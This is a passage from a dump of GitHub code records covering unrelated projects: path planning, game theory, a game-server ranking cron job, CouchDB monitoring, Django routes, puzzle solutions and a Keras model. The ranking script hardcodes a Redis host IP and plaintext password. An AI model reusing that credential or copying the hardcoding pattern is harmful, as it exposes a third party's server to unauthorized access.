\"\"\"\n arr = np.array([east, north]) / np.array([map.scale_x, map.scale_y])\n arr = np.array([np.array([*self.transformer.invtransform(east, north)])])\n\n return arr * np.array([self.scale_x, self.scale_y])\n\n def reflect_points(self, points: np.array):\n \"\"\"Reflects the points\n\n Parameters\n ----------\n\n points: np.array of shape (N, 2)\n Points to be reflected\n\n Returns\n -------\n\n np.array of shape (N, 2)\n Reflected points\n \"\"\"\n\n reflection_matrix = np.array(\n [\n [1, 0],\n [0, -1],\n ]\n )\n\n return np.array([reflection_matrix @ point for point in points])\n\n def get_points(self, start: np.array, end: np.array):\n \"\"\"Gets the points between `start` and `end` point\n\n Parameters\n ----------\n\n start: np.array of shape (2, )\n Latitude and longitude of starting point\n\n end: np.array of shape (2, )\n Latitude and longitude of destination point\n\n Returns\n -------\n\n np.array of shape (N, 2) where N is the number of points\n Obtained path points in cartesian coordinates\n \"\"\"\n\n # Latitude and longitude coordinates of the two points\n point1 = (start[0], start[1])\n point2 = (end[0], end[1])\n\n # Calculate the distance between the two points\n distance = haversine(point1, point2)\n\n # Set the number of points you want to generate along the line\n num_points = int(distance * 400)\n\n # Calculate the latitude and longitude increments for each point\n lat_inc = (end[0] - start[0]) / (num_points - 1)\n lon_inc = (end[1] - start[1]) / (num_points - 1)\n\n # Generate the points\n points = []\n for i in range(num_points):\n points.append(\n np.array(\n [\n start[0] + (i * lat_inc),\n start[1] + (i * lon_inc),\n ]\n )\n )\n\n return np.array(points)\n\n def get_path(self, start: np.array, end: np.array):\n \"\"\"Gets the path from `start` to `end` point\n\n Parameters\n ----------\n\n start: np.array of shape (2, )\n Latitude and longitude of starting point\n\n end: np.array of shape (2, )\n Latitude and longitude of destination point\n\n Returns\n -------\n\n np.array of shape (N, 2) where N is the number of points\n Obtained path points in cartesian coordinates\n \"\"\"\n\n path = np.array(\n [\n [step[\"end_location\"][\"lat\"], step[\"end_location\"][\"lng\"]]\n for step in self.gmaps.directions(\n start,\n end,\n mode=\"driving\",\n alternatives=False,\n units=\"metric\",\n )[0][\"legs\"][0][\"steps\"]\n ]\n )\n path = np.insert(path, 0, start, axis=0)\n new_path = []\n for i in range(len(path) - 1):\n new_path.extend(self.get_points(path[i], path[i + 1]))\n\n new_path = np.array(new_path)\n\n # Get rid of 2-way roads\n temp = []\n originalIndex = -1\n segment_size = 100\n path_segments = [\n new_path[i : i + segment_size]\n for i in range(0, len(new_path), segment_size)\n ]\n for segment in path_segments:\n segment_result = self.gmaps.nearest_roads(segment)\n for step in segment_result:\n if originalIndex != step[\"originalIndex\"]:\n temp.append(\n [step[\"location\"][\"latitude\"], step[\"location\"][\"longitude\"]]\n )\n originalIndex = step[\"originalIndex\"]\n\n origin_coord = self.transformer.transform(start[0], start[1])\n\n coords = np.zeros((len(temp), 2))\n for i in range(len(temp)):\n coords[i] = self.get_coordinates(temp[i][0], temp[i][1])\n\n return coords\n\n def round_path(self, path: np.array) -> np.array:\n \"\"\"\n Rounds the corners of path and returns the new path\n \"\"\"\n points_to_remove = list()\n for i, point in enumerate(path[3:-3], 3):\n if (\n abs(np.tensordot(path[i + 1] - point, point - path[i - 1], axes=1))\n < 0.01\n ): # if the cross dot is small -> cos() is small -> angle between points is close to 90º\n rot_center = (\n path[i - 3] + path[i + 3] - point\n ) # last point of a square formed by the sum of the point behind with the upfront vector\n\n # vector between the two edges of square (one point is the edge of the curve (point) and the center of rotation (rot_center) )\n vector = point - rot_center\n angle = np.arctan2(vector[1], vector[0])\n vector = (\n np.linalg.norm(vector)\n * 0.8\n * np.array([np.cos(angle), np.sin(angle)])\n )\n\n # obtain a point that is now closer to the center of rotation of the curve\n desired_point = vector + rot_center\n path[i][0], path[i][1] = desired_point[0], desired_point[1]\n\n # remove the points that were close to remove the edge\n points_to_remove.append(i - 1)\n points_to_remove.append(i + 1)\n points_to_remove.append(i + 2)\n path = np.delete(path, points_to_remove, axis=0)\n return path\n\n def orient_path(self, path: np.array) -> np.array:\n oriented_path = np.zeros(shape=(len(path), 4))\n\n for i in range(0, len(path)):\n oriented_path[i][:2] = path[i]\n\n if i < len(path) - 1:\n # Add phi\n oriented_path[i][3] = np.arctan2(\n (path[i + 1][1] - path[i][1]), (path[i + 1][0] - path[i][0])\n )\n else:\n oriented_path[i][3] = oriented_path[i - 1][3]\n oriented_path[i][2] = oriented_path[i][3]\n\n return oriented_path\n","repo_name":"TiagoLourinho/autonomous-car","sub_path":"source/blocks/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":11938,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"3875233402","text":"from array import array\nimport numpy as np\nimport nashpy as nash\n\n# Crear matriz de pago\nA = np.array([[4, 0], [0, 2]]) # A es la fila del jugador\nB = np.array([[2, 0], [0, 4]]) # B es la columna del jugador\ngame2 = nash.Game(A, B)\ngame2\n# Encuentre el equilibrio de Nash\ngetEquilibrium= lambda: game2.support_enumeration()\n\nprint(\"-------Estrategias Mixtas---------\")\nprint(\"3 lineas de salida\")\neq = getEquilibrium()\nfor item in eq:\n print(item)\n\neq = getEquilibrium()\nsigma_r, sigma_c = [array for array in eq][-1]\npd = nash.Game(A, B)\n\nprint()\nprint(\"Punto de equilibrio con estrategias mixtas\")\nprint(pd[sigma_r, sigma_c])\nprint(\"-------------FIN-------------------\")\n","repo_name":"ggomez0/InvOpeII-ProyFinal","sub_path":"Unidad I - Teoria de Juegos/EstMixtas_Arratia_Gomez.py","file_name":"EstMixtas_Arratia_Gomez.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3928624596","text":"# -*- coding: utf-8 -*-\n__author__ = 'Administrator'\n\nimport sys\nimport time\nimport redis\nfrom sqlalchemy.sql import select, update, delete, insert, and_, subquery, not_, null, func, text,exists,desc\n\nfrom config.rank import *\nfrom db.connect import *\nfrom db.rank_charge_top import *\nfrom db.user import *\nfrom db.rank_make_money_top import *\nfrom helper import datehelper\nfrom hall.hallobject import *\n\nRANK_REWARD = {\n # 金币,钻石,vip经验,[(道具1,数量),(道具2,数量),]\n 'rank_charge_top':(10000,1000,1000,[(1,12),(2,24)],),\n 'rank_gold_top':(10000,1000,1000,[(1,12),(2,24)],),\n 'rank_make_money_top':(10000,1000,1000,[(1,12),(2,24)],),\n}\nREDIS_CONF = {\n 'host':'121.201.29.89','port':26379,'db':0,'password':'Wgc@123456',\n}\n\nDAILY_KEY = 'DailyTasks'\nsession = Session()\nclass CrondServer:\n\n def __init__(self):\n self.redis = redis.Redis(**REDIS_CONF)\n\n # self.da = DataAccess(self.redis)\n\n def load_data(self, rank_type):\n return getattr(self, 'load_'+rank_type)()\n\n def save_data(self, rank_type, top_one, top_index):\n return getattr(self, 'save_'+rank_type)(rank_type, top_one, top_index)\n\n def load_rank_charge_top(self):\n return session.query(TRankChargeTop).filter(TRankChargeTop.add_date == datehelper.get_yesterday().strftime('%Y-%m-%d')).order_by(desc(TRankChargeTop.charge_money)).limit(RANK_CHARGE_REWARD)\n def load_rank_gold_top(self):\n return session.query(TUser).order_by(desc(TUser.gold)).limit(RANK_WEALTH_REWARD)\n def load_rank_make_money_top(self):\n last_week = int(time.strftime('%W')) -1\n if last_week == 0:\n last_week = 1\n return session.query(TRankMakeMoneyTop).filter(and_(TRankMakeMoneyTop.add_year == time.strftime('%Y'), TRankMakeMoneyTop.week_of_year == last_week)).order_by(desc(TRankMakeMoneyTop.gold)).limit(RANK_MAKE_MONEY_REWARD)\n\n\n def save_rank_charge_top(self, rank_type, top_one, top_index):\n if top_index >= RANK_CHARGE_REWARD:\n return\n\n user = top_one['uid'] if hasattr(top_one,'uid') else top_one['id']\n if top_one.charge_money is None:\n return\n\n reward_diamond = int(top_one.charge_money) / RANK_CHARGE_RATE\n\n MessageObject.send_mail(session, user,0,\n title = u'充值榜奖励',\n content = RANK_CHARGE_MAIL % (top_index+1,reward_diamond),\n type = 1,\n diamond = reward_diamond,\n gold = 0,\n items = '')\n\n\n def save_rank_gold_top(self, rank_type, args):\n self.save_rank_charge_top(rank_type,args)\n\n def save_rank_make_money_top(self, rank_type, top_one, top_index):\n if top_index >= RANK_MAKE_MONEY_REWARD:\n return\n\n user = top_one['uid'] if hasattr(top_one,'uid') else top_one['id']\n\n MessageObject.send_mail(session,user,0,\n title = u'赚金榜奖励',\n content = RANK_MAKE_MONEY_MAIL % (top_index+1,RANK_MAKE_MONEY_REWARD_CONF[top_index+1]),\n type = 1,\n diamond = RANK_MAKE_MONEY_REWARD_CONF[top_index+1],\n gold = 0,\n items = '')\n\n\n\n def run(self, func_name):\n items = self.load_data(func_name)\n for index,item in enumerate(items):\n self.save_data(func_name, item, index)\n session.flush()\n\n def remove_daily_task(self):\n self.redis.delete(DAILY_KEY)\nif __name__ == '__main__':\n crond = CrondServer()\n if len(sys.argv) > 3:\n func_name = sys.argv[1]\n param_name = sys.argv[2]\n getattr(crond, func_name)(param_name)\n else:\n func_name = sys.argv[1]\n getattr(crond, func_name)()\n\n\n # python -m crond.rank run rank_charge_top\n # python -m crond.rank run rank_make_money_top\n # python -m crond.rank remove_daily_task","repo_name":"1suming/zjh_2017","sub_path":"code/crond/rank.py","file_name":"rank.py","file_ext":"py","file_size_in_byte":3814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39190914539","text":"from __future__ import print_function, absolute_import, division, unicode_literals\n\nimport os\n\nfrom setuptools import find_packages, setup\n\n_HERE = os.path.abspath(os.path.dirname(__file__))\nwith open(os.path.join(_HERE, 'README.md'), 'r') as f:\n long_desc = f.read()\n\nsetup(\n name='hyp3proclib',\n use_scm_version=True,\n description='HyP3 process communication and IO library plugin',\n long_description=long_desc,\n long_description_content_type='text/markdown',\n\n url='https://github.com/asfadmin/hyp3-proc-lib',\n\n author='ASF APD/Tools Team',\n author_email='uaf-asf-apd@alaska.edu',\n\n license='BSD-3-Clause',\n include_package_data=True,\n\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: BSD License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Topic :: Software Development :: Libraries',\n ],\n\n install_requires=[\n 'boto3',\n 'hyp3lib~=1.0',\n 'importlib_metadata',\n 'pillow',\n 'psycopg2',\n 'requests',\n 'six',\n ],\n\n extras_require={\n 'develop': [\n 'pytest',\n 'pytest-cov',\n 'pytest-console-scripts',\n ]\n },\n\n packages=find_packages(),\n\n # entry_points={'console_scripts': [\n # ]\n # },\n\n zip_safe=False,\n)\n","repo_name":"asfadmin/hyp3-proc-lib","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43373200269","text":"n, p, q = map(int, input().split())\nif n == 0 :\n print(1)\n exit(0)\n \nd = dict()\nd[0] = 1\n\ndef calc(num) : \n global p, q\n if num not in d :\n d[num] = 0\n \n ip = int(num / p)\n iq = int(num / q)\n \n if ip not in d :\n d[num] += calc(ip)\n else :\n d[num] += d[ip]\n \n if iq not in d :\n d[num] += calc(iq)\n else :\n d[num] += d[iq]\n \n return d[num]\n \nprint(calc(n))","repo_name":"hobin-jang/baekjoon","sub_path":"python/1351.py","file_name":"1351.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"21838020516","text":"import unittest\n\nfrom botlang import Parser\n\n\nclass ASTTestCase(unittest.TestCase):\n\n def test_copy(self):\n\n original_ast = Parser.parse(\"\"\"\n (begin\n [define entry-node\n (bot-node (input-data)\n [define message (input-message)]\n [define first-name [get (split (get input-data \"name\")) 0]]\n [define data (put input-data \"first-name\" first-name)]\n (cond\n [(match? \"SUCURSAL_.+\" message)\n (node-result data (sucursal-info message) end-node)\n ]\n [else\n (entry-section data (append \"Hola \" first-name))\n ]\n )\n )\n ]\n (bot-node (data)\n [define msg (input-message)]\n (if (equal? msg \"\")\n (node-result data \"\" end-node)\n (entry-node data)\n )\n )\n )\n \"\"\", source_id='test')[0]\n\n ast_copy = original_ast.copy()\n entry_node_body_copy = ast_copy.expressions[0].expr.body\n entry_node_body_copy.expressions[0].name = 'mensajito'\n\n entry_node_body_original = original_ast.expressions[0].expr.body\n self.assertEqual(\n entry_node_body_original.expressions[0].name,\n 'message'\n )\n self.assertEqual(\n entry_node_body_copy.expressions[0].name,\n 'mensajito'\n )\n\n self.assertEqual(\n entry_node_body_original.s_expr,\n entry_node_body_copy.s_expr\n )\n","repo_name":"PostCenter/botlang","sub_path":"tests/test_ast.py","file_name":"test_ast.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18681399668","text":"# -*- coding: utf-8 -*-\n\nimport base64\nimport json\n\nfrom base import SimpleService\n\ntry:\n import urllib.request as urllib2\nexcept ImportError:\n import urllib2\n\nDELTA = {}\n\n\nclass Service(SimpleService):\n def __init__(self, configuration=None, name=None):\n SimpleService.__init__(self, configuration=configuration, name=name)\n self.monitoring_dbs = self.configuration.get('monitoring_dbs')\n self.monitoring_dbs = ['one', 'two']\n # self.untrack_dbs = self.configuration.get('untrack_dbs', ['_replicator', '_users'])\n # self.baseurl = self.configuration.get('url')\n self.baseurl = 'http://10.0.0.10:5984'\n self.active_tasks_url = '{}/_active_tasks/'.format(self.baseurl)\n self.user = self.configuration.get('couch_username') or None\n self.password = self.configuration.get('couch_password') or None\n self.encoded_auth = None\n if self.user and self.password:\n self.encoded_auth = base64.encodestring('%s:%s' % (self.user, self.password)).replace('\\n', '')\n self.repl_order = []\n self.repl_definitions = {}\n self.data = {}\n def check(self):\n try:\n # check connection\n check_dbs = self.monitoring_dbs[:]\n for db in check_dbs:\n status = self._get_stats_data(db)\n if not status:\n self.error('Cant connect to database %s, passing it' % db)\n self.monitoring_dbs.remove(db)\n if len(self.monitoring_dbs) == 0:\n self.error('No more databases left.')\n return False\n else:\n self.info('Database %s checked' % db)\n\n except Exception as e:\n self.error('Error in check: {}'.format(str(repr(e))))\n return False\n return True\n\n def _get_response(self, url):\n \"\"\"\n Return json-formatted list from url\n :param url: string\n :return: list or False\n \"\"\"\n try:\n request = urllib2.Request(url)\n if self.encoded_auth:\n request.add_header(\"Authorization\", \"Basic %s\" % self.encoded_auth)\n response_raw = urllib2.urlopen(request).read()\n response = json.loads(response_raw)\n except IOError as e:\n self.error('Error in getting {}: {}'.format(url, str(repr(e))))\n response = False\n return response\n\n def __flush_data(self):\n # !!! POSSIBLE ISSUES\n for key in self.data.keys():\n if 'source_seq' in key or 'checkpointed_seq' in key:\n del self.data[key]\n else:\n self.data[key] = 0\n\n def __calc_delta(self, *args):\n \"\"\"\n Calc delta (difference) between current and previous metric data \n :param args: str\n :return: None\n \"\"\"\n for metric in args:\n delta_metric = '{}_delta'.format(metric)\n if self.data[metric] is None:\n self.data[metric] = 0\n if metric not in DELTA:\n DELTA[metric] = self.data[metric]\n current = self.data[metric]\n difference = self.data[metric] - DELTA[metric]\n self.data[delta_metric] = difference\n DELTA[metric] = current\n\n def __get_host_and_db(self, url):\n \"\"\"\n Cut and return host and db of remote server from given url \n :param url: str\n :return: str\n \"\"\"\n import re\n if 'http' in url:\n if '@' in url: # if auth\n source = re.split('[/:@]', url)[5]\n db = re.split('[/:@]', url)[7]\n else:\n source = re.split('[/:]', url)[3]\n db = re.split('[/:@]', url)[5]\n else:\n source = 'localhost'\n db = url\n return source, db\n\n def _get_stats_data(self, db_name):\n \"\"\"\n Get data from http://localhost:couch_port/db_name/\n and store it in self.data.\n :param db_name: str\n :return: None or False\n \"\"\"\n db_stats_url = '{}/{}'.format(self.baseurl, db_name)\n db_stats = self._get_response(db_stats_url)\n if not db_stats:\n return False\n else:\n try:\n self.data['{}_data_size'.format(db_name)] = db_stats['data_size'] / 1000000\n self.data['{}_disk_size_overhead'.format(db_name)] = \\\n (db_stats['disk_size'] - db_stats['data_size']) / 1000000\n self.data['{}_docs'.format(db_name)] = db_stats['doc_count']\n self.data['{}_docs_deleted'.format(db_name)] = db_stats['doc_del_count']\n self.data['{}_committed_db_seq'.format(db_name)] = \\\n db_stats['committed_update_seq']\n self.data['{}_update_db_seq'.format(db_name)] = db_stats['update_seq']\n self.__calc_delta(\n '{}_docs'.format(db_name),\n '{}_docs_deleted'.format(db_name),\n '{}_committed_db_seq'.format(db_name),\n '{}_update_db_seq'.format(db_name)\n )\n self.__create_stats_charts(db_name)\n except (ValueError, AttributeError) as e:\n self.error('Cant get database stats: {}'.format(str(repr(e))))\n return False\n return True\n\n def __create_stats_charts(self, db_name):\n \"\"\"\n Called only from check()\n :param db_name: str\n :return: order, definitions\n \"\"\"\n order = []\n definitions = {}\n documents_delta = '{}_database_documents_delta'.format(db_name)\n documents = '{}_database_documents'.format(db_name)\n fragmentation = '{}_database_fragmentation'.format(db_name)\n seq_delta = '{}_database_seq_delta'.format(db_name)\n seq = '{}_database_seq'.format(db_name)\n order.extend((\n documents_delta,\n documents,\n fragmentation,\n seq_delta,\n seq))\n\n for chart in order:\n definitions[chart] = {'options': [], 'lines': []}\n\n definitions[documents_delta]['options'] = \\\n [None, 'Documents delta', 'documents', 'Database {}'.format(db_name), '', 'line']\n definitions[documents_delta]['lines'].extend((\n ['{}_docs_delta'.format(db_name), 'docs delta', 'absolute', 1, 1],\n ['{}_docs_deleted_delta'.format(db_name), 'docs_deleted delta', 'absolute', 1, 1]\n ))\n definitions[documents]['options'] = \\\n [None, 'Documents count', 'documents', 'Database {}'.format(db_name), '', 'line']\n definitions[documents]['lines'].extend((\n ['{}_docs'.format(db_name), 'docs', 'absolute', 1, 1],\n ['{}_docs_deleted'.format(db_name), 'docs_deleted', 'absolute', 1, 1]\n ))\n definitions[fragmentation]['options'] = \\\n [None, 'Database fragmentation', 'Megabytes', 'Database {}'.format(db_name), '', 'stacked']\n definitions[fragmentation]['lines'].extend((\n ['{}_disk_size_overhead'.format(db_name), 'disk size overhead', 'absolute', 1, 1],\n ['{}_data_size'.format(db_name), 'data size', 'absolute', 1, 1]\n ))\n definitions[seq_delta]['options'] = \\\n [None, 'Database seq delta', 'seq', 'Database {}'.format(db_name), '', 'line']\n definitions[seq_delta]['lines'].extend((\n ['{}_committed_db_seq_delta'.format(db_name), 'committed seq', 'absolute', 1, 1],\n ['{}_update_db_seq_delta'.format(db_name), 'update seq', 'absolute', 1, 1]\n ))\n definitions[seq]['options'] = \\\n [None, 'Database seq', 'seq', 'Database {}'.format(db_name), '', 'line']\n definitions[seq]['lines'].extend((\n ['{}_committed_db_seq'.format(db_name), 'committed seq', 'absolute', 1, 1],\n ['{}_update_db_seq'.format(db_name), 'update seq', 'absolute', 1, 1]\n ))\n self.order = self.order + order\n self.definitions.update(definitions)\n\n def _get_replication_data(self, db_name):\n \"\"\"\n Get replication data from /_active_tasks\n :param db_name: str\n :return: None or False\n \"\"\"\n active_tasks = self._get_response(self.active_tasks_url)\n if not active_tasks:\n return None\n else:\n for active_task in active_tasks:\n if active_task['type'] == \"replication\":\n source_host, source_db = self.__get_host_and_db(active_task['source'])\n target_host, target_db = self.__get_host_and_db(active_task['target'])\n\n if target_host == 'localhost' and target_db == db_name:\n repl_type = 'pull'\n elif target_host != 'localhost' and source_db == db_name:\n repl_type = 'push'\n else:\n continue\n # values\n source_seq = active_task['source_seq']\n checkpointed_seq = active_task['checkpointed_source_seq']\n # var names\n source_seq_name = '{}:{}_{}_source_seq'.format(source_host, source_db, repl_type)\n checkpointed_seq_name = '{}:{}_checkpointed_seq'.format(source_host, source_db, repl_type)\n # chart var\n source_chart_name = 'source_seq {}:{}'.format(source_host, source_db)\n checkpointed_chart_name = 'checkpointed_source_seq {}:{}'.format(source_host, source_db)\n self.data[source_seq_name] = source_seq\n self.data[checkpointed_seq_name] = checkpointed_seq\n self.__calc_delta(\n source_seq_name,\n checkpointed_seq_name\n )\n\n # need to create charts\n self.__create_replication_charts(db_name, source_chart_name, source_seq_name, repl_type)\n self.__create_replication_charts(db_name, checkpointed_chart_name, checkpointed_seq_name,\n repl_type)\n self.order = self.order + self.repl_order\n self.definitions.update(self.repl_definitions)\n\n def __create_replication_charts(self, db_name, chart_name, var_name, repl_type):\n \"\"\"\n :param db_name: db\n :param chart_name: source_seq host:db\n :param var_name: host:db_pull_source_seq\n :param repl_type: pull\n :return: order, definitions\n \"\"\"\n dimension_name = '{}_{}_replication_seq'.format(db_name, repl_type)\n dimension_name_delta = '{}_{}_replication_seq_delta'.format(db_name, repl_type)\n\n chart_name_delta = '{}_delta'.format(chart_name)\n var_name_delta = '{}_delta'.format(var_name)\n\n if self.repl_definitions == {}: # first run\n if dimension_name not in self.order:\n self.repl_order.append(dimension_name_delta)\n self.repl_order.append(dimension_name)\n\n for chart in self.repl_order:\n self.repl_definitions[chart] = {'options': [], 'lines': []}\n\n self.repl_definitions[dimension_name_delta]['options'] = \\\n [None, '{} replication seq delta'.format(repl_type), 'seq', 'Database {}'.format(db_name), '', 'line']\n self.repl_definitions[dimension_name]['options'] = \\\n [None, '{} replication seq'.format(repl_type), 'seq', 'Database {}'.format(db_name), '', 'line']\n\n self.repl_definitions[dimension_name_delta]['lines'].append(\n [var_name_delta, chart_name_delta, 'absolute', 1, 1]\n )\n self.repl_definitions[dimension_name]['lines'].append(\n [var_name, chart_name, 'absolute', 1, 1]\n )\n\n def _get_data(self):\n create = False\n temp_order = self.order[:]\n temp_definitions = self.definitions.copy()\n # clear\n self.__flush_data()\n self.order = []\n self.definitions = {}\n # get data\n for db in self.monitoring_dbs:\n self._get_stats_data(db)\n self._get_replication_data(db)\n self.repl_order = []\n self.repl_definitions = {}\n # check new data\n if temp_order != self.order or temp_definitions != self.definitions:\n create = True\n # create charts\n if create: self.create()\n return self.data\n\n def create(self):\n \"\"\"\n Create charts\n :return: boolean\n \"\"\"\n # data = self._get_data()\n # if data is None:\n # return False\n\n idx = 0\n for name in self.order:\n options = self.definitions[name]['options'] + [self.priority + idx, self.update_every]\n self.chart(self.chart_name + \".\" + name, *options)\n # check if server has this datapoint\n for line in self.definitions[name]['lines']:\n if line[0] in self.data:\n self.dimension(*line)\n idx += 1\n\n self.commit()\n return True\n\n#\nDEBUG = True\nif DEBUG:\n s = Service(\n configuration={\n 'update_every': 1,\n 'retries': 60,\n 'priority': 60000\n }\n )\n s.check()\n s.create()\n s.run()\n","repo_name":"shellshock1953/share","sub_path":"couchdb_dbstats.chart.py","file_name":"couchdb_dbstats.chart.py","file_ext":"py","file_size_in_byte":13429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4680261628","text":"#!/usr/bin/env /usr/bin/python3.4\nimport sys\nimport os\nimport signal\n\noption = sys.argv[1]\nif len(sys.argv) > 2:\n\tprint(\"====================================================\")\n\tprint(\"Usage of kvs_manager : \")\n\tprint(\"kvs_manager start/stop/status\")\n\tprint(\"====================================================\")\n\n\ndef main():\n\n\tif option == \"start\":\n\t\tprint(\"Starting kvs_manager ...\")\n\t\tos.chdir(\"/aux0/customer/containers/ockvsman/bin/\")\n\t\tos.system(\"/usr/bin/python3.4 kvs_wrapper.py >/dev/null 2>/dev/null &\")\n\telif option == \"stop\":\n\t\tpstring = \"kvs_wrapper.py\"\n\t\tfor line in os.popen(\"ps ax | grep \" + pstring + \" | grep -v grep\"):\n\t\t\tfields = line.split()\n\t\t\tpid = fields[0]\n\t\tprint(\"Stopping kvs_wrapper ...\")\n\t\tos.kill(int(pid), signal.SIGKILL)\n\telif option == 'status':\n\t\tpstring = \"kvs_wrapper.py\"\n\t\tpid = None\n\t\tfor line in os.popen(\"ps ax | grep \" + pstring + \" | grep -v grep\"):\n\t\t\tfields = line.split()\n\t\t\tpid = fields[0]\n\t\tif not pid:\n\t\t\tprint(\"kvs_wrapper is not running: NO PID\")\n\t\t\treturn\n\t\telse:\n\t\t\tprint(\"kvs_wrapper is running: {}\".format(pid))\t\n\telse:\n\t\tprint(\"====================================================\")\n\t\tprint(\"Usage of kvs_wrapper : \")\n\t\tprint(\"kvs_manager start/stop/status\")\n\t\tprint(\"====================================================\")\n\nmain()","repo_name":"pkolev1994/kvsmanager","sub_path":"bin/ockvsman.py","file_name":"ockvsman.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23932295803","text":"from django.urls import path\nfrom .views import *\nurlpatterns = [\n path('',principal,name='principal'),\n path('autos/',autos,name='autos'),\n path('clientes/',clientes,name='clientes'),\n path('ingresarautos/',ingresarAutos,name='ingresarautos'),\n path('ingresarclientes/',ingresarClientes,name='ingresarclientes'),\n path('eliminarautos/<int:id>/',eliminarAutos,name='eliminarautos'),\n path('eliminarclientes/<int:id>/',eliminarClientes,name='eliminarclientes'),\n path('actualizarauto/<int:id>/',actualizarAuto,name='actualizarauto'),\n path('actualizarcliente/<int:id>/',actualizarCliente,name='actualizarcliente'),\n]\n","repo_name":"YOYO-DR/yoiner-duran-2567910","sub_path":"autos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27757309025","text":"tower = []\n\nwith open(\"Day7Input.txt\", \"r\") as f:\n for line in f:\n tower.append(line.strip().split())\n\n# Round 2\nclass Tree(object):\n \"Generic tree node.\"\n\n def __init__(self, name=\"root\", weight=0, children=None):\n self.name = name\n self.weight = weight\n self.children = []\n if children is not None:\n for child in children:\n self.add_child(child)\n self.weight_plus_children = self.get_all_weight()\n self.balanced = (\n len(list(set([child.weight_plus_children for child in self.children])))\n == 1\n )\n if not self.balanced:\n print(\"Unbalanced...\", self.name)\n print([child.weight_plus_children for child in self.children])\n print([child.name for child in self.children])\n else:\n self.balanced = True\n\n def __repr__(self):\n return self.name\n\n def add_child(self, node):\n assert isinstance(node, Tree)\n self.children.append(node)\n\n def get_all_weight(self):\n if self.children is None:\n return self.weight\n else:\n self.weight_plus_children = self.weight\n for child in self.children:\n print\n \"child.get_all_weight()\", child.get_all_weight()\n self.weight_plus_children += child.get_all_weight()\n\n return self.weight_plus_children\n\n\nroot = \"ykpsek\" # \"tknk\"#\ndisc_names = [item[0] for item in tower]\ndependencies = {}\ndisc_weights = {}\n\nfor i in range(len(tower)):\n if \"->\" in tower[i]:\n to_add = []\n for j in range(3, len(tower[i])):\n to_add.append(tower[i][j].split(\",\")[0])\n dependencies[disc_names[i]] = to_add\n else:\n dependencies[disc_names[i]] = None\n disc_weights[disc_names[i]] = int(tower[i][1][1:-1])\n\n\ndef create_tree(my_tree):\n if dependencies[my_tree] == None:\n return Tree(my_tree, disc_weights[my_tree], None)\n else:\n return Tree(\n my_tree,\n disc_weights[my_tree],\n [create_tree(i) for i in dependencies[my_tree]],\n )\n\n\nmy_tree = create_tree(root)\n\n# Round 1\n#\n# top_row = []\n# dependencies = {}\n#\n# for i in range(len(tower)):\n# if '->' in tower[i]:\n# to_add = []\n# for j in range(3, len(tower[i])):\n# to_add.append(tower[i][j].split(\",\")[0])\n# dependencies[disc_names[i]] = to_add\n# else:\n# top_row.append(disc_names[i])\n#\n# while len(dependencies.keys()) > 2:\n# new_dependencies = {}\n# new_top_row = []\n#\n# for item in dependencies.keys():\n# non_top = []\n# for value in dependencies[item]:\n# if value not in top_row:\n# non_top.append(value)\n# if len(non_top) != 0:\n# new_dependencies[item] = [i for i in non_top]\n# else:\n# new_top_row.append(item)\n# dependencies = new_dependencies\n# top_row += new_top_row\n#\n# print(new_dependencies.keys())\n","repo_name":"glsdown/adventofcode-2017","sub_path":"Day7.py","file_name":"Day7.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"69873594002","text":"import sys\nfrom itertools import permutations\narr=sys.stdin.readline().strip()\nans='Z'*50\nfor i in set(permutations(arr)):\n print(i)\n flag=True\n for k in range(len(arr)//2):\n if i[k]!=i[len(arr)-1-k]:\n flag=False\n break\n if flag:\n if ans>''.join(i):\n ans=''.join(i)\nif not len(ans):\n print(\"I'm Sorry Hansoo\")\nelse:\n print(ans)\n","repo_name":"auddus16/Algorithm_python","sub_path":"bookstudy/알고리즘핵심문제20/1213_팰린드롬만들기.py","file_name":"1213_팰린드롬만들기.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17807679599","text":"import cv2\nimport numpy as np\nfrom keras.models import Model\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras.layers import Input, merge, SpatialDropout2D\nfrom keras.layers import Convolution2D, AveragePooling2D, UpSampling2D\nfrom keras.optimizers import Adam\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras import backend as K\n\nfrom data import load_train_data, load_test_data\n\nK.set_image_dim_ordering('th') # Theano dimension ordering in this code\n\nimg_rows = 100\nimg_cols = 160\nstack = 10\n\nsmooth = 1.\n\n\ndef dice_coef(y_true, y_pred):\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n return (2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)\n\n\ndef dice_coef_loss(y_true, 